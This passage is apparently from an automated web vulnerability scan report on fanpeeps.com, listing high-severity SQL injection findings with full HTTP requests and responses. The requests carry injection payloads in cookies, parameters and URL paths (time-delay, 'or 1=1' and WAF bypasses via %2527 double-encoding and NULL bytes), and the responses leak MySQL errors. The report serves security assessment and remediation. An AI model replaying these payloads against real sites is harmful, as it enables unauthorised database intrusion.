User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response 1

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:48:17 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 19384

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

Request 2

GET /?action=page&pid=&page=contact HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527%2527
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response 2

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:48:20 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 19473

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...

1.4. http://fanpeeps.com/ [__utma cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. The payload ')waitfor%20delay'0%3a0%3a20'-- was submitted in the __utma cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /? HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2')waitfor%20delay'0%3a0%3a20'--; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:44:14 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17473

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.5. http://fanpeeps.com/ [__utmb cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fanpeeps.com
Path:   /

Issue detail

The __utmb cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmb cookie, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. There is probably no need to perform a second URL-decode of the value of the __utmb cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /?action=page&pid=&page=contact HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380%2527;

Response 1

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:46:53 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 19466

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

Request 2

GET /?action=page&pid=&page=contact HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380%2527%2527;

Response 2

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:46:54 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 37908

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...

1.6. http://fanpeeps.com/ [__utmb cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /

Issue detail

The __utmb cookie appears to be vulnerable to SQL injection attacks. The payload 11256744'%20or%201%3d1--%20 was submitted in the __utmb cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /?pid=&idol=&action=tweets HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.130537638011256744'%20or%201%3d1--%20;

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:47:09 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 19582

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.7. http://fanpeeps.com/ [__utmc cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. The payload )waitfor%20delay'0%3a0%3a20'-- was submitted in the __utmc cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /? HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936)waitfor%20delay'0%3a0%3a20'--; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:44:37 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17290

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.8. http://fanpeeps.com/ [__utmc cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fanpeeps.com
Path:   /

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmc cookie, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /? HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936%00'; __utmb=181893936.9.10.1305376380;

Response 1

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:47:46 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17944

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

Request 2

GET /? HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936%00''; __utmb=181893936.9.10.1305376380;

Response 2

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:47:47 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17567

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...

1.9. http://fanpeeps.com/ [__utmc cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fanpeeps.com
Path:   /

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmc cookie, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /?action=page&pid=&page=contact HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936'; __utmb=181893936.9.10.1305376380;

Response 1

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:46:34 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 19385

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

Request 2

GET /?action=page&pid=&page=contact HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936''; __utmb=181893936.9.10.1305376380;

Response 2

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:46:38 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 36516

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...

1.10. http://fanpeeps.com/ [__utmz cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the __utmz cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /? HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)%00'; PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:43:57 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17317

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.11. http://fanpeeps.com/ [__utmz cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. The payload '%20and%201%3d1--%20 was submitted in the __utmz cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /? HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)'%20and%201%3d1--%20; PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:46:25 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17308

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.12. http://fanpeeps.com/ [idol parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /

Issue detail

The idol parameter appears to be vulnerable to SQL injection attacks. The payload 67989367'%20or%201%3d1--%20 was submitted in the idol parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /?pid=&idol=67989367'%20or%201%3d1--%20&action=tweets HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:44:22 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 19647

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.13. http://fanpeeps.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ',0,0,0)waitfor%20delay'0%3a0%3a20'-- was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /??1',0,0,0)waitfor%20delay'0%3a0%3a20'--=1 HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:45:56 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17361

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.14. http://fanpeeps.com/ [pid parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /

Issue detail

The pid parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the pid parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /?action=news&pid=18'&iid=6 HTTP/1.1
Host: fanpeeps.com
Proxy-Connection: keep-alive
Referer: http://fanpeeps.com/worldcup
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=181893936.1520938759.1305373774.1305373774.1305373774.1; __utmc=181893936; __utmb=181893936.2.10.1305373774

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 11:50:06 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 10077

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.15. http://fanpeeps.com/bg2.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /bg2.jpg

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload " was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /bg2.jpg" HTTP/1.1
Host: fanpeeps.com
Proxy-Connection: keep-alive
Referer: http://fanpeeps.com/worldcup
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=181893936.1520938759.1305373774.1305373774.1305373774.1; __utmc=181893936; __utmb=181893936.1.10.1305373774

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 11:50:07 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 17354

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.16. http://fanpeeps.com/bg2.jpg [__utma cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /bg2.jpg

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the __utma cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /bg2.jpg HTTP/1.1
Host: fanpeeps.com
Proxy-Connection: keep-alive
Referer: http://fanpeeps.com/?action=news&pid=18&iid=7
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=181893936.1520938759.1305373774.1305373774.1305373774.1'; __utmc=181893936

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:32:39 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 17390

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

